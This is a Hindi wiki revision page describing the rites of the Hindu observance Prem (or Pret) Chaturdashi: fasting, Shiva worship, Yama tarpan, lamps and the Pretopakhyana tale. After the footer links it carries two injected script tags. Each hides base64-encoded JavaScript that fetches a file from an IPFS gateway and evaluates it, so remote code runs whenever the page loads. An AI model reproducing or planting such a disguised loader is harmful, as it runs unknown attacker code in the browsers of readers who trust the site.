प्रेम चतुर्दशी: Difference between revisions
भारत डिस्कवरी प्रस्तुति
Jump to navigation
Jump to search
[unchecked revision] | [unchecked revision] |
No edit summary |
m (प्रेमचतुर्दशी का नाम बदलकर प्रेम चतुर्दशी कर दिया गया है) |
(No difference)
|
Revision as of 12:05, 8 September 2010
- भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित हिन्दू धर्म का एक व्रत संस्कार है।
- कार्तिक कृष्ण चतुर्दशी पर रात्रि से ही व्रतारम्भ हो जाता है, यदि साथ ही मंगल एवं चित्रा नक्षत्र हो तो सोने पे सुहागा, पुण्य बढ़ जाता है।
- देवता, शिव का पूजन किया जाता है।
- यदि 14 विद्धा हो तो वह दिन जब 14वीं तिथि रात्रि तक रहती है, श्रेष्ठ गिनी जाती है।
- 14वीं को उपवास; शिव पूजन; शिव भक्तों को भोजन एवं दान; इस तिथि पर गंगा स्नान से पाप मुक्ति मिलती है।
- सिर पर अपामार्ग की टहनी घुमानी चाहिए और यम के 14 नामों को लेकर यम तर्पण करना चाहिए।
- नदी, ब्रह्मा, विष्णु एवं शिव के मन्दिरों, घरों एवं चौराहों पर दीप मालाएँ जलानी चाहिए।
- अपने कुटुम्ब की 21 पीढ़ियों के साथ कर्ता शिवलोक चला जाता है।
- इस तिथि पर कुटुम्ब के उन मृत व्यक्तियों के लिए, जो या तो युद्ध में मारे गये रहते हैं या अमावास्या में मरे रहते हैं, मशाल जलाये जाते हैं।
- कर्ता प्रेतोपाख्यान नामक गाथा सुनता है जो 'सम्वत्सरप्रदीप' [1] में संगृहीत है और जिसमें उन पाँच प्रेतों की कथाएँ हैं, जिनकी एक ब्राह्मण से भेंट हुई थी। यह गाथा भीष्म ने युधिष्ठिर को सुनायी थी। भीष्म ने यह बताया है कि किन कर्मों से व्यक्ति प्रेत हो जाता है और किन कर्मों से प्रेत की योनि से मुक्ति पाता है।
- कर्ता को 'कृत्यचिन्तामणि' में वर्णित 14 शाकों (तरकारियों) का सेवन करना चाहिए [2]; [3]; [4]; [5], [6]; [7]; [8]।
- यह सम्भवतः इसीलिए 'प्रेत चतुर्दशी' कहलाती है, क्योंकि इस अवसर पर प्रेतोपाख्यान सुनाया जाता है।
|
|
|
|
|
टीका टिप्पणी और संदर्भ
संबंधित लिंक
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>